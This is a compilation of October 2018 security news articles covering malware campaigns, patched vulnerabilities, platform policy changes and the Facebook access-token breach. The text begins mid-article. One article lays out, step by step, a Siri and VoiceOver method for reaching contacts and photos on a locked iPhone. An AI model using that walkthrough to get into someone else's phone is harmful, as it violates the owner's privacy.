The malware connects the command and control (C&C) via third-party hosting services such as Dropbox, pCloud, Yandex Cloud, and Box.

“What originally began as research surrounding a new malware family named NOKKI that had code overlap and other ties to KONNI lead us to an interesting discovery tying the NOKKI malware family to the Reaper threat actor group.” Palo Alto Networks concludes.

“Additionally, we discovered yet another malware family that has not been previously publicly reported that we have named Final1stspy,”


New Danabot Banking Malware campaign now targets banks in the U.S.
3.10.2018 securityaffairs
Virus

According to malware researchers from Proofpoint, DanaBot attackers launched a new campaign aimed at banks in the United States.
A couple of weeks ago, security experts at ESET observed a surge in activity of DanaBot banking Trojan that was targeting Poland, Italy, Germany, Austria, and as of September 2018, Ukraine.

DanaBot is a multi-stage modular banking Trojan written in Delphi, the malware allows operators to add new functionalities by adding new plug-ins.

When it was analyzed by Proofpoint, its experts speculated the threat has been under active development.

The banking Trojan initially targeted Australia and Poland users, then it has expanded in other countries, including Italy, Germany, Austria, and as of September 2018, Ukraine.

According to Proofpoint, now DanaBot attackers launched a new campaign aimed at banks in the United States as well. Experts monitored different campaigns using a different ID found in server communications, a circumstance that suggests the DanaBot is being offered through the malware-as-a-service model.

ProofPoint has identified 9 different actors distributing the Trojan to a specific region, experts highlighted that only Australia was targeted by two different groups of attackers.

“Based on distribution methods and targeting, we have been grouping DanaBot activity using an “affiliate ID” that we have observed in various part of the C&C protocol (e.g., offset 0xc of the 183-byte binary protocol header). ” reads the report published by ProofPoint.

The campaign against North America uses spam messages that pretend to be digital faxes from eFax received by the recipients.

Danabot Banking Malware

When the recipient clicks on the download button included in the content of the message, it will download a weaponized Word document that poses as an eFax.

Is the recipient enables the macros to properly view the fax, the malicious code executes the embedded Hancitor malware that downloads two versions of Pony stealer and the DanaBot banking malware

“The emails used an eFax lure (Figure 1) and contained a URL linking to the download of a document containing malicious macros (Figure 2). The macros, if enabled by the user, executed the embedded Hancitor malware [3], which, in turn, received tasks to download two versions of Pony stealer and the DanaBot banking malware.” continue the analysis.

Experts from Proofpoint highlighted that each affiliate id is utilizing different distribution methods, some actors leverage the Fallout Exploit Kit, others web injects or malspam campaigns. Researchers also found similarities between how DanaBot and the CryptXXX Ransomware that was using a custom command and control protocol on TCP port 443.

Proofpoint speculates DanaBot’s C&C traffic is an evolution of this protocol that uses AES encryption in addition to the Zlib compression.

The researchers believe that the developers created DanaBot as part of an evolution of CryptXXX.

“Thus it would seem that Danabot follows in a long line of malware from one particular group. This family began with ransomware, to which stealer functionality was added in Reveton.” concludes Proofpoint.

“The evolution continued with CryptXXX ransomware and now with a banking Trojan with Stealer and remote access functionality added in Danabot.”


Experts found 9 NAS flaws that expose LenovoEMC, Iomega Devices to hack
3.10.2018 securityaffairs
Vulnerebility

Experts discovered nine vulnerabilities affecting NAS devices that could be exploited by unauthenticated attackers to access protected content.
Nine flaws affecting NAS devices could be exploited by unauthenticated attackers to access protected content.

The vulnerabilities are traked as CVE-2018-9074, CVE-2018-9075, CVE-2018-9076, CVE-2018-9077, CVE-2018-9078, CVE-2018-9079, CVE-2018-9080, CVE-2018-9081 and CVE-2018-9082.

According to Lenovo, the flaws affect 20 models of network attached storage (NAS) devices sold by the company, including Lenovo-branded NAS devices, LenovoEMC, and Iomega.

The list of vulnerable devices includes eight LenovoEMC NAS (PX) models, nine Iomega StoreCenter (PX and IX) models and the Lenovo branded devices; ix4-300d, ix2 and EZ Media and Backup Center.

The flaws have been discovered as a part of a research project conducted by ISE Labs focused on the security of embedded devices.

Lenovo NAS

Most of the devices audited by the researchers were affected by some sort of OS command injection vulnerability that could be exploited by remote attackers to take over the targeted system via root shell.

Chaining different vulnerabilities it is possible to gain full access to the device, experts noticed for example that the availability of the user’s access token and a session cookie-like identifier ( “__c parameter”) could allow the attackers to reach the goal. A typical attack scenario to gain this information sees attackers to luring an authenticated NAS user by tricking it into visiting a specially crafted malicious website.

“If we want to exploit this OS command injection we are going to need to figure out how these tokens are generated or access to the victim’s iomegaUserCookie (__c) token. Whenever I think about stealing some type of value stored in the user’s browser I think about cross-site scripting (XSS).” states the researchers.

The experts found a cross-site scripting vulnerability that allowed them to access the information, then used stored browser data to execute commands on the vulnerable devices.

Once obtained a target’s NAS access token and “_c parameter” it is possible to target the storage device by knowing its static IP address, a joke for attackers.

Summarizing, chaining command injection vulnerability with privilege escalation issues the attacker could execute commands on the devices on behalf of legitimate users.

The experts reported the vulnerabilities to Lenovo on August 3 and the company issued patches for vulnerable systems on Sept. 20 and publicly disclosed the vulnerabilities on September 30.

The list of CVEs include: CVE-2018-9074, CVE-2018-9075, CVE-2018-9076, CVE-2018-9077, CVE-2018-9078, CVE-2018-9079, CVE-2018-9080, CVE-2018-9081 and CVE-2018-9082.

Lenovo confirmed that firmware versions 4.1.402.34662 and earlier are vulnerable, users have to download firmware version 4.1.404.34716 (or later).

The company suggests removing any public shares and using the device only on trusted networks in case it is not possible to immediately update the firmware.


Z-LAB Report – Analyzing the GandCrab v5 ransomware
3.10.2018 securityaffairs
Ransomware

Experts at the Cybaze Z-Lab have analyzed the latest iteration of the infamous GandCrab ransomware, version 5.0.
Malware researchers at Cybaze ZLab analyzed the latest version of the infamous GandCrab ransomware, version 5.0. Most of the infections have been observed in central Europe, but experts found evidence that the malicious code doesn’t infect Russian users. GandCrab operates like a classic ransomware, it encrypts all user files and drops some ransom notes on the infected machine.

The ransomware uses a pseudo-randomic extension (5 characters long), that is different for each infection (some of these extensions are: .txvpq, .rttmc, .mcbot, etc…).

The ransom note contains some information related to the infection: an ID (“fed0a66240f8743f”, in the image below), a “GANDCRAB KEY”, required to restore the original files, and some encrypted information about the infected system such as the username, the PC name, the domain, the operative system and the language.

GandCrab 5

Unlike GandCrab v4, this version is able to kill some processes associated with some popular applications (i.e. Word, Excel, SQLServer etc.) to allow the code to encrypt the files opened by these applications.

GandCrab 5

The payment process is implemented through the hidden service associated with the Tor address:

hxxp://gandcrabmfe6mnef[.]onion, which is the same used by previous versions of the malware.

Technical details, including IoCs and Yara Rules, are reported in the analysis shared by researchers at the ZLab.


Foxit Reader 9.3 addresses 118 Vulnerabilities, 18 of them rated as critical
3.10.2018 securityaffairs
Vulnerebility

Foxit Software released a security update for its Foxit Reader product that addresses over 100 vulnerabilities, 18 of them rated as critical.
Foxit Software released a security update for its Foxit Reader product that addresses over 100 vulnerabilities, some of them that could be exploited by a remote attacker to execute arbitrary code.

Foxit Reader is a multilingual freemium PDF tool that can create, view, edit, digitally sign, and print PDF files, it has hundreds of millions of installations.

Foxit has released Reader 9.3 and Foxit PhantomPDF 9.3 to address security and stability issues.

Foxit Reader 9.3 addressed a broad range of vulnerabilities, including out-of-bounds, use-after-free, information disclosure, type confusion, and memory corruption bugs.

The updates fix a total of 116 vulnerabilities, 18 of them are rated as “critical” and have been discovered by the researchers at Cisco Talos group.

The flaws affect the JavaScript engine of the Foxit Reader, an attacker could exploit the vulnerabilities by creating specially crafted web pages or PDF documents that could trigger these vulnerabilities.

The updates were issued a couple of days before Adobe released security patches for 86 flaws in Mac and Windows version of Adobe Acrobat and Adobe Reader, 46 of them rated as critical.


New Twitter Rules Target Fake Accounts, Hackers
2.10.2018 securityweek
Social

Twitter on Monday announced that it has made some changes in preparation for the upcoming midterm elections in the United States. The changes include updated rules that target fake accounts and hackers.

Social media companies have been criticized for allowing their platforms to be abused for influence campaigns ahead of the 2016 presidential election in the U.S. In response, Twitter, Facebook and Google have started taking steps to neutralize these types of operations, particularly by blocking accounts used to spread false information in an effort to manipulate users.

Twitter has now announced some updates on what it described as its “elections integrity efforts,” including changes to the Twitter rules.Twitter updates rules ahead of elections

The updated Twitter rules target three main issues, and one of them is fake accounts. The social media giant – based on feedback from users – has decided to suspend not just accounts involved in spam campaigns, but also accounts “engaged in a variety of emergent, malicious behaviors.”

The company plans on identifying fake accounts based on several factors, including the use of stock or stolen profile photos, the use of copied profile descriptions, and intentionally misleading profile information, such as location.

The second key issue targeted by the updated rules is related to “attributed activity.” Twitter will now crack down on accounts that it can reliably link to entities known to have violated its rules. This includes accounts that mimic or aim to replace previously suspended accounts.

Finally, Twitter is targeting accounts that distribute hacking-related materials. Until now, it prohibited the distribution of private information, trade secrets or materials that could cause harm to individuals. The rules have now been expanded to include users that take responsibility for a cyberattack, and ones that make threats or offer incentives to hack specific accounts.

“Commentary about a hack or hacked materials, such as news articles discussing a hack, are generally not considered a violation of this policy,” Twitter representatives wrote in a blog post.

Twitter claims its previously implemented measures are already paying off. The company says it recently removed roughly 50 accounts falsely claiming to be associated with the U.S. Republican party.

“We have also taken action on Tweets sharing media regarding elections and political issues with misleading or incorrect party affiliation information. We continue to partner closely with the RNC, DNC, and state election institutions to improve how we handle these issues,” Twitter said.

The company also pointed out that it recently closed 770 Iran-linked accounts engaging in coordinated manipulation, it challenged millions of potential spam accounts, and it removed hundreds of thousands of apps and tightened access to its API.

Twitter also announced some updates that impact users’ timeline. The company wants to ensure that users receive the most relevant information related to the elections and it’s making it easier for users to identify legitimate candidate accounts. Candidates are being offered increased support and advised to enable two-factor authentication on their account for better security.


Adobe Patches 86 Vulnerabilities in Acrobat Products
2.10.2018 securityweek
Vulnerebility

Adobe on Monday released updates for the Windows and macOS versions of its Acrobat products to address tens of vulnerabilities, including critical issues that allow arbitrary code execution.

Acrobat DC and Acrobat Reader DC (Continuous) 2019.008.20071, Acrobat 2017 and Reader DC 2017 (Classic 2017) 2017.011.30105, and Acrobat DC and Reader DC (Classic 2015) 2015.006.30456 patch a total of 86 flaws.

The list includes 22 out-of-bounds write issues, 7 heap overflows, 7 use-after-free bugs, 3 type confusion issues, one double-free bug, 3 buffer errors, and 3 untrusted pointer dereference bugs – all of these are critical and can be exploited for code execution.

One security bypass issue that can lead to privilege escalation has also been classified as “critical.” The remaining flaws are stack overflow, integer overflow, and out-of-bounds read issues that have been described as “important” and which can lead to information disclosure.

Independent researchers and employees of Qihoo 360, Cisco Talos, Beihang University, Palo Alto Networks, Knownsec, Check Point Software Technologies, and Tencent were credited for reporting these vulnerabilities. Many of the security holes were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

However, the researcher credited for the highest number of bugs is Omri Herscovici, vulnerability research team leader at Check Point. He reported 35 of the flaws patched by Adobe on Monday.

While many of the vulnerabilities have been classified as “critical,” Adobe has assigned the security updates a priority rating of “2,” which indicates that there are no known exploits and the company does not believe exploits are imminent.

Last month, Adobe only patched 7 vulnerabilities in its Acrobat products. However, it’s not uncommon for the company to resolve a large number of security weaknesses in these applications – back in July it fixed over 100.

*Updated the number of patched vulnerabilities from 85 to 86 after obtaining clarifications from Adobe


U.S. Energy Department Invests Another $28 Million in Cybersecurity
2.10.2018 securityweek
BigBrothers

The U.S. Department of Energy on Monday announced that it’s investing up to $28 million in tools and technologies that will improve the resilience and cybersecurity of the power grid and oil and gas infrastructure.

The funding comes from the Office of Cybersecurity, Energy Security, and Emergency Response (CESER), which the DOE launched in February, and it aims to support the strategy described in the agency’s recently unveiled multiyear cybersecurity plan.DOE investing $28 million in cybersecurity

The money will support research, development and demonstration (RD&D) of innovative tools and technologies designed for preventing, detecting and mitigating cyber threats.

“Protecting the Nation’s energy delivery systems from cyber-threats is a top national priority,” said U.S. Secretary of Energy Rick Perry. “These awards will spur the next level of innovation needed to advance cyber resilience, ensuring that the Nation’s critical energy infrastructure can withstand potential cyber attacks while also still keeping the lights on.”

There are a total of 11 projects focusing on creating a cyber-resilient architecture for the electric and oil and natural gas subsectors, cybersecurity for oil and natural gas environments, secure communications, secure cloud-based technologies for operation technology (OT) networks, and technologies for enhancing cybersecurity in the energy sector.

Universities, national laboratories, and private-sector companies have teamed up for each of the projects. Award recipients include ABB, Dragos, GE Global Research, Schweitzer Engineering Laboratories (SEL), TDi, the Texas A&M Engineering Experiment Station, the United Technologies Research Center, and WhiteScope.

DOE investing $28 million in cybersecurity

Industrial cybersecurity firm Dragos leads a project called The Neighborhood Keeper, which aims to develop a low-cost, cloud-based sensor network within OT networks to "enable integration of available technologies that will facilitate real-time and actionable information to reduce cyber risk.”

“Dragos is excited to be participating in a DOE program that helps expand accessibility to ICS cybersecurity,” Robert Lee, CEO of Dragos, said via email. “The secure, cost-effective architecture of Neighborhood Keeper is a service to the ICS community that will enable collaborative industrial control systems threat intelligence without the risk of sharing private information.”

This is not the first time the Energy Department announces significant investment in cybersecurity. Roughly one year ago it offered over $20 million for projects focusing on cybersecurity, and earlier this year it announced awards of up to $25 million for technologies designed to protect the country’s energy infrastructure against cyber threats.


Google Tightens Rules for Chrome Extensions
2.10.2018 securityweek
Privacy

Google this week announced a series of policy changes and updates to improve the overall security of Chrome extensions.

There are currently more than 180,000 extensions available in the Chrome Web Store, and nearly half of Chrome desktop users actively use extensions, which makes the security of these components critical to the user browser experience.

Over the past couple of years, there have been numerous incidents where Chrome extensions were abused for traffic hijacking, click fraud, or adware distribution. After removing inline installation of extensions earlier this year, Google is changing the rules again to better protect Chrome users.

Starting with Chrome 70, users will be able to either restrict extension host access to a custom list of sites, or to configure them to require a click to gain access to the current page, James Wagner, Chrome Extensions Product Manager, reveals.

Host permissions, Wagner notes, allow extensions to automatically read and change data on websites, thus being prone to misuse, either malicious or unintentional. Thus, the search giant has decided to improve user transparency and control over when extensions can access site data and developers are advised to make the necessary changes to their apps as soon as possible.

The review process will tighten for extensions that request powerful permissions, as well as for those that use remotely hosted code, which will be subject to ongoing monitoring, Wagner notes. Developers should ensure their extension’s permissions is as narrowly-scoped as possible and that all the code is included directly in the extension package, to minimize review time.

Starting October 1, extensions with obfuscated code are no longer allowed in the Chrome Web Store, regardless of whether the obfuscation is applied to code within the package or to external code or resources. Existing extensions with obfuscated code will be removed in early January, provided that they don’t receive updates to become compliant.

“Today over 70% of malicious and policy violating extensions that we block from Chrome Web Store contain obfuscated code. At the same time, because obfuscation is mainly used to conceal code functionality, it adds a great deal of complexity to our review process. This is no longer acceptable given the aforementioned review process changes,” Wagner points out.

Extension developers are still allowed to use minification, which not only speeds up code execution by reducing size, but also makes extensions more straightforward to review. Techniques that are allowed include removal of whitespace, newlines, code comments, and block delimiters; shortening of variable and function names; and collapsing the number of JavaScript files.

Starting in 2019, Google will also require all Chrome Web Store developer accounts to enroll in 2-Step Verification. This should add extra protection to prevent incidents where attackers attempt to steal popular extensions by hijacking the developer account.

“For even stronger account security, consider the Advanced Protection Program. Advanced protection offers the same level of security that Google relies on for its own employees, requiring a physical security key to provide the strongest defense against phishing attacks,” Wagner says.

Next year, Google also plans on introducing the next extensions manifest version, which should improve security, privacy, and performance. It will bring more narrowly-scoped and declarative APIs, easier mechanisms for users to control the permissions granted to extensions, and alignment with new web capabilities, such as supporting Service Workers as a new type of background process.

“We recognize that some of the changes announced today may require effort in the future, depending on your extension. But we believe the collective result will be worth that effort for all users, developers, and for the long term health of the Chrome extensions ecosystem. We’re committed to working with you to transition through these changes and are very interested in your feedback,” Wagner concludes.


Passcode Bypass Method Exposes Photos, Contacts on iPhone XS
2.10.2018 securityweek
Apple

An iPhone enthusiast has disclosed yet another method for bypassing the iPhone lockscreen. The latest technique has been confirmed to work on the new iPhone XS running the latest version of Apple’s mobile operating system, iOS 12.

Jose Rodriguez, known for his YouTube channel “videosdebarraquito,” found several passcode bypass techniques in the past and he has now identified another one.

As with all passcode bypass methods, physical access to the targeted device is required. Another prerequisite is that Siri needs to be enabled and Face ID has to be disabled for the hack to work.

The technique involves asking Siri to enable VoiceOver, an accessibility feature that allows users with visual impairments to use their Apple device by having the content of the screen and selected buttons read out to them.

The next step is to call the locked device so that the “Messages” icon appears on the screen. Once the messages menu is opened by selecting the “custom” option, a notification needs to be triggered on the targeted iPhone (e.g. by sending it a text, Facetime or Telegram message). When the notification is displayed, a double tap on the screen reveals a white page that contains hidden buttons and functions.

The VoiceOver feature allows the hacker to navigate through and use these buttons, including to access contacts and photos stored on the phone.

Apple likely intended to keep these buttons hidden while the iPhone was locked, but it appears that they are still visible and usable by the VoiceOver system.

While contact information is easier to obtain, the attacker has to blindly pick which photos from the gallery they want displayed.

The YouTube channel EverythingApplePro, which also published a video confirming the method, reported that the technique even works on iOS 12.1 beta.

SecurityWeek has reached out to Apple to find out if the company is aware of the new security bypass flaw and if it plans on releasing a patch. While in the past the tech giant managed to patch some lockscreen bypass vulnerabilities through server-side changes, the latest method may require an iOS update.

A second video posted by Rodriguez appears to show that the invisible menus can also be accessed by using Siri to create notes and activating the VoiceOver features. This method does not require calling or messaging the targeted phone.


The ‘Gazorp’ Azorult Builder emerged from the Dark Web
2.10.2018 securityaffairs
Virus

Checkpoint experts discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to create customized binaries for the Azorult malware.
Security researchers from Checkpoint have discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to easily create customized binaries for the Azorult info-stealing malware.

The Gazorp builder allows generating for free the malicious code to steal passwords, payment information, cryptocurrency wallet data and more.

“On 17th September Check Point Research found a new online builder, dubbed ‘Gazorp’, hosted on the Dark Web. Gazorp is designed for building binaries of the popular malware, Azorult, an infostealer used for stealing user passwords, credit card information, ” states CheckPoint.

“Furthermore, the Gazorp service is provided free of charge and gives threat actors the ability to create fresh Azorult samples and corresponding panel server code, leaving them simply to provide their Command & Control (C&C) address. This address gets embedded into the newly created binary, which in turn can be distributed in any way the threat actor sees fit.”

Check Point researchers took the platform for a test-drive and found that Gazorp does, indeed, perform as advertised, “effectively” creating samples of Azorult version 3.0.

Experts at CheckPoint have tried the Gazorp builder and successfully generated working samples of Azorult version 3.0.

Gazorp Azorult Builder

This version of the malware was observed in the wild five months ago, since then, it was updated two times, experts discovered the versions, 3.1 and 3.2 in live attacks.

Azorult has been around since at least 2016, malware researchers at Proofpoint spotted a new version of the AZORult Spyware in the wild, it was involved in a large email campaign on July 18, just 24 hours it appeared in cybercrime forums on the Dark Web.

Experts also noted that Gazorp’s emergence on the Dark Web was the result of the leak of the code for the Azorult’s panel (for versions 3.1 and 3.2).

The availability of the code allows anyone to easily create its own version of the Azorult C&C panel, the experts added that the leak also contained a builder for the latest version of the malware. This builder isn’t the original one used by the authors, “it merely encoded and placed the C&C address string given to it as an argument by the user to a particular field in a ready-made binary.”

“It is possible then that the simple mechanism and the overall delivery of the recent versions to the public inspired Gazorp’s authors to introduce it online.” continues the analysis.

The online builder links to a Telegram channel used by the authors to update users on their activity and to share updates on the project.

Gazorp authors plan to implement future extensibility with a “modules” section, the ability to configure the panel and export the various databases to a file.

Experts believe we can soon assist at a spike of campaigns leveraging the Azorult info-stealer generated with the Gazorp builder.

“For now, it seems we are looking at a very early version of the Gazorp service (0.1), where the main product delivered is an enhanced Azorult C&C panel code. However, we do expect the project to evolve with time, and possibly produce new variants for Azorult.” concludes CheckPoint.

“Given that the service is free, it is also possible that new campaigns with Gazorp built binaries will start to emerge in higher scale in the wild. We will keep monitoring this threat and provide any insights on our research blog when such will come up.”


Adobe security updates for Acrobat fix 86 Vulnerabilities, 46 rated as critical
2.10.2018 securityaffairs
Vulnerebility

Adobe has released security updates to fix 86 vulnerabilities in Mac and Windows version of Adobe Acrobat and Adobe Reader, 46 of them rated as critical.
Adobe has released security updates to address 86 vulnerabilities affecting Mac and Windows version of Adobe Acrobat and Adobe Reader. The security updates fix 47 vulnerabilities classified as ‘critical’ and 39 flaws classified as ‘important’.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and MacOS. These updates address critical and important vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

46 critical vulnerabilities could be exploited by attackers to execute arbitrary code on the vulnerable systems, the remaining one is a privileges escalation bug. All the 39 flaws classified as ‘important’ are information disclosure.

Users can update their installations manually by choosing Help > Check for Updates, the full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.

Adobe Acrobat and Adobe Reader users should install the latest versions as soon as possible (Acrobat DC and Acrobat Reader DC version 2019.008.20071, Acrobat 2017 and Acrobat Reader DC version 2017.011.30105, Acrobat DC 2015 and Acrobat Reader DC 2015 versions 2015.006.30456).

The security advisory includes the full list of patched vulnerabilities and organizations or experts that reported them.


Fileless Malware Attacks on the Rise, Microsoft Says
2.10.2018 securityweek
Virus

Fileless malware attacks, or incidents where the malicious payload doesn’t touch the disk, but is executed directly in memory instead, are on the rise, Microsoft says.

Attacks that leverage fileless techniques are not new, but were recently adopted by a broader range of malware. A couple of years ago, the Kovter Trojan was well known for the use of this infection method, but various threat actors, ransomware, and even crypto-mining malware adopted it since.

Last November, a Barkly report suggested that fileless assaults were ten times more likely to succeed compared to other infection methods.

Now, Microsoft says that the move to fileless techniques was only the next logical step in the evolution of malware, especially with antivirus solutions becoming increasingly efficient at detecting malicious executables.

“Real-time protection gives visibility on each new file that lands on the disk. Furthermore, file activity leaves a trail of evidence that can be retrieved during forensic analysis,” Andrea Lelli of the Windows Defender Research team at Microsoft notes in a blog post.

“Removing the need for files is the next progression of attacker techniques,” Lelli says.

The result of this is an increase in attacks that use malware with fileless techniques, where the executable is never dropped on the disk. The approach not only removes the need of relying on physical files, but also improves stealth and persistence.

For attackers, this also means the discovery of new techniques for executing the code, which some solved by infecting legitimate components and achieving execution in these components’ environment. Referred to as “living off the land”, the technique usually abuses tools that are already available on the platform, such as mshta.exe.

As Lelli points out, however, there is no generally accepted definition of a fileless attack, and even malware families that do rely on files to operate are included. Thus, some parts of the attack might be fileless, while others would still rely on the filesystem.

Overall, Microsoft groups fileless threats into different categories, based on entry point (execution/injection, exploit, hardware), the form of entry point (file, script, etc.), and the host of the infection (Flash, Java, documents), which results in three big types of fileless threats.

The malware can be completely fileless (performing no file activity), writes no files to disk but still uses some files indirectly, or requires the use of files to achieve fileless persistence.

While file-based inspection is ineffective against fileless malware, behavioural analytics and other technologies should be efficient in detecting such attacks.

Microsoft themselves integrated their Windows Defender Advanced Threat Protection (ATP) with capabilities such as behaviour monitoring, memory scanning, and boot sector protection, to detect and terminate threat activity at runtime.

Furthermore, Windows Defender ATP integrates with Antimalware Scan Interface (AMSI), “an open framework that applications can use to request antivirus scans of any data,” to defend against fileless malware and other threats, Microsoft says.

When it comes to fighting fileless attacks that live off the land, behaviour monitoring is particularly useful, Lelli says. In fact, Microsoft has been long touting Windows 10’s ability to detect in-memory attack methods that abuse legitimate processes.

Memory scanning is also useful when it comes to detecting the presence of malicious code in the memory of a running process. Even malware that runs without the use of a physical file (such as the GandCrab ransomware) needs to reside in memory to operate, and memory scanning can detect it there, Lelli points out.

Another defense that’s effective against fileless attacks is boot sector protection. In Windows 10, controlled folder access prevents write operations to the boot sector, thus helping Windows Defender ATP stop attack vectors used by Petya, BadRabbit, and bootkits.

“As antivirus solutions become better and better at pinpointing malicious files, the natural evolution of malware is to shift to attack chains that use as few files as possible. While fileless techniques used to be employed almost exclusively in sophisticated cyberattacks, they are now becoming widespread in common malware, too,” Microsoft concludes.


Several Bugs Exploited in Massive Facebook Hack
2.10.2018 securityweek
Social

Facebook Shares More Details on Hack Affecting 50 Million Accounts

Facebook Shares More Details About Hack Affecting 50 Million Accounts

Facebook has shared additional details about the hacker attack affecting 50 million accounts, including technical information and what its investigation has uncovered so far.

The social media giant announced on Friday that malicious actors exploited a vulnerability related to the “View As” feature to steal access tokens that could have been leveraged to hijack accounts. The tokens of nearly 50 million users have been compromised.

The tokens of these users have been reset to prevent abuse, along with the tokens of 40 million others who may be at risk due to the fact that they were subject to a View As lookup in the past year – impacted users will need to log back in to their accounts. The problematic feature has been suspended until a security review is conducted.

Technical details on Facebook hack

The “View As” feature shows users how others see their profile. This is a privacy feature designed to help users ensure that they only share information and content with the intended audience.

The vulnerability that exposed access tokens involved a combination of three distinct bugs affecting the “View As” feature and a version of Facebook’s video uploader interface introduced in July 2017.

When “View As” is used, the profile should be displayed as a read-only interface. However, the text box that allows people to wish happy birthday to their friends erroneously allowed users to post a video – this was the first bug.

When posting a video in the affected box, the video uploader generated an access token that had the permissions of the Facebook mobile app – this was the second bug as the video uploader should not have generated a token at this point.

The third and final problem was that the generated token was not for the user who had been using “View As” but for the individual whose profile was being looked up.

Hackers could obtain the token from the page’s HTML code, and use it access the targeted user’s account. An attacker would first have to target one of their friends’ account and move from there to other accounts. The attack did not require any user interaction.

“The attackers were then able to pivot from that access token to other accounts, performing the same actions and obtaining further access tokens,” explained Pedro Canahuati, VP of Engineering, Security and Privacy at Facebook.

Users and information affected by the breach

Facebook says the vulnerability has been patched. The social media giant claims that while the attackers did try to query its APIs to access profile information – such as name, gender and hometown – there is no evidence that any private information was actually accessed.

Facebook’s investigation continues, but the company says it has found no evidence that the attackers accessed private messages or credit card information.

Facebook says impacted users are from all around the world – it does not appear that the attack was aimed at a specific country or region. It’s worth noting that Facebook founder and CEO, Mark Zuckerberg, and Sheryl Sandberg, the company’s COO, were among those affected.

Another noteworthy issue is that the exposed tokens can be used not only to access Facebook accounts, but also third-party apps that use Facebook login. However, the risk should be eliminated now that the existing tokens have been reset.

Users who have linked Facebook to an Instagram account will need to unlink and relink their accounts due to the tokens being reset. Facebook clarified that WhatsApp is not impacted.

Facebook is alerting users whose tokens have been compromised by sending notifications to their accounts. In some cases, users can check if their accounts were actually hacked by accessing the “Security and Login” page from the Settings menu. However, access is only logged if the attacker created a full web session.

Incident timeline and information on attackers

Facebook discovered the breach following an investigation that started on September 16, after noticing a traffic spike, specifically increased user access to the website. However, it only realized that it was dealing with an attack on September 25, when it also identified the vulnerability. Affected users were notified and had their access tokens reset beginning with Thursday, September 27.

As for the attackers, no information has been shared, but the social media firm did note that exploitation of the vulnerability is complex and it did require a certain skill level.

Impact on Facebook

The company says it has notified the FBI and law enforcement. While the company has responded quickly after the breach was discovered, MarketWatch reports that the Data Protection Commission in Ireland, Facebook's main privacy regulator in Europe, could fine the company as much as $1.64 billion under the recently introduced GDPR.

U.S. Senator Mark R. Warner responded to news of the Facebook hack, asking for a full investigation.

“Today’s disclosure is a reminder about the dangers posed when a small number of companies like Facebook or the credit bureau Equifax are able to accumulate so much personal data about individual Americans without adequate security measures,” Sen. Warner said. “This is another sobering indicator that Congress needs to step up and take action to protect the privacy and security of social media users. As I’ve said before – the era of the Wild West in social media is over.”

FTC Commissioner Rohit Chopra wrote on Twitter that he wants answers.

Despite no evidence of harm to any user, a class action lawsuit has already been filed against Facebook in the United States.

Facebook stock fell 3 percent after the breach was disclosed.


California IoT Cybersecurity Bill Signed into Law
2.10.2018 securityweek
IoT

California Governor Jerry Brown last week signed the country’s first Internet of Things (IoT) cybersecurity law, along with a controversial state-level net neutrality law.

The IoT cybersecurity law, SB-327, was introduced in February 2017 by Senator Hannah-Beth Jackson (D-Santa Barbara). SB-327 goes into effect on January 1, 2020, and it requires manufacturers of Internet-connected devices – such as TVs, phones, toys, household appliances and routers – to ensure that their products have “reasonable security features.” These security features should be able to protect sensitive customer information from unauthorized access.

“The lack of basic security features on internet connected devices undermines the privacy and security of California’s consumers, and allows hackers to turn everyday consumer electronics against us,” said Sen. Jackson. “SB 327 ensures that technology serves the people of California, and that security is not an afterthought but rather a key component of the design process.”California governor signs IoT cybersecurity law and net neutrality law

Veteran cybersecurity expert and cryptographer Bruce Schneier, who helped draft the IoT Cybersecurity Improvement Act of 2017, applauded the initiative, telling The Washington Post that it will “help everybody” even if “it probably doesn’t go far enough.” The IoT Cybersecurity Improvement Act of 2017, which could force security into IoT, has not made it past the Senate Committee on Homeland Security and Governmental Affairs.

Others have outright called the new SB 327 law “bad.” One of its biggest critics is Robert Graham of Errata Security, who described it as a “typically bad bill based on a superficial understanding of cybersecurity/hacking that will do little improve security, while doing a lot to impose costs and harm innovation.”

Gov. Brown last week also signed what have been described as the strictest net neutrality protections in the United States. Washington, Vermont and Oregon have also passed their own net neutrality regulations, and others will likely follow.

The Department of Justice claims the law, SB 822, is illegal. U.S. Attorney General Jeff Sessions argued that the Constitution prohibits states from regulating interstate commerce.

“Once again the California legislature has enacted an extreme and illegal state law attempting to frustrate federal policy. The Justice Department should not have to spend valuable time and resources to file this suit today, but we have a duty to defend the prerogatives of the federal government and protect our Constitutional order,” Sessions said.

Unsurprisingly, the representatives of U.S. telecoms companies also oppose the legislation.

“Broadband providers strongly support net neutrality, but SB 822 undercuts California’s long history as a vibrant catalyst for innovation and technology,” said Jonathan Spalter, President and CEO of broadband industry lobbying group USTelecom. “The internet must be governed by a single, uniform and consistent national policy framework, not state-by-state piecemeal approaches. Governor Brown should use his veto pen on this legislation, and Congress should step in to legislate and provide consumer protections that will resolve this issue once and for all.”

On the other hand, many activists and Internet freedom supporters praise California for the law.

“This victory in California is a testament to the power of the free and open Internet to defend itself. And it’s a beacon of hope for Internet users everywhere who are fighting for the basic right to express themselves and access information without cable and phone companies controlling what they can see and do online.” said Evan Greer, deputy director of Fight for the Future, a digital rights group that played an important role in passing SB 822.

“Despite their army of lobbyists and millions spent lining the pockets of legislators, these companies continue to lose ground in the face of overwhelming cross-partisan opposition to their greedy attacks on our Internet freedom. When all is said and done, Comcast, Verizon, and AT&T are going to wish they’d never picked a fight with Internet over net neutrality. Other states should follow California’s lead, and Congress should pass the joint resolution to reverse the FCC’s resoundingly unpopular repeal,” Greer added.


The Scandals Bedevilling Facebook
2.10.2018 securityweek
Social

Facebook is at the centre of controversy yet again after admitting that up to 50 million accounts were breached by hackers.

Facebook chief executive Mark Zuckerberg said engineers discovered the breach on Tuesday, and patched it on Thursday night.

"We don't know if any accounts were actually misused," Zuckerberg said. "We face constant attacks from people who want to take over accounts or steal information around the world."

Facebook reset the 50 million breached accounts, meaning users will need to sign back in using passwords. It also reset "access tokens" for another 40 million accounts as a precautionary measure.

Here is a roundup of the scandals dogging the social media giant.

- Cambridge Analytica -

In Facebook's telling, everything goes back to 2013 when Russian-American researcher Aleksandr Kogan creates a personality prediction test app, "thisisyourdigitallife", which is offered on the social network.

Around 300,000 people download the app, authorising access to information on their profile and also to the data of their Facebook friends.

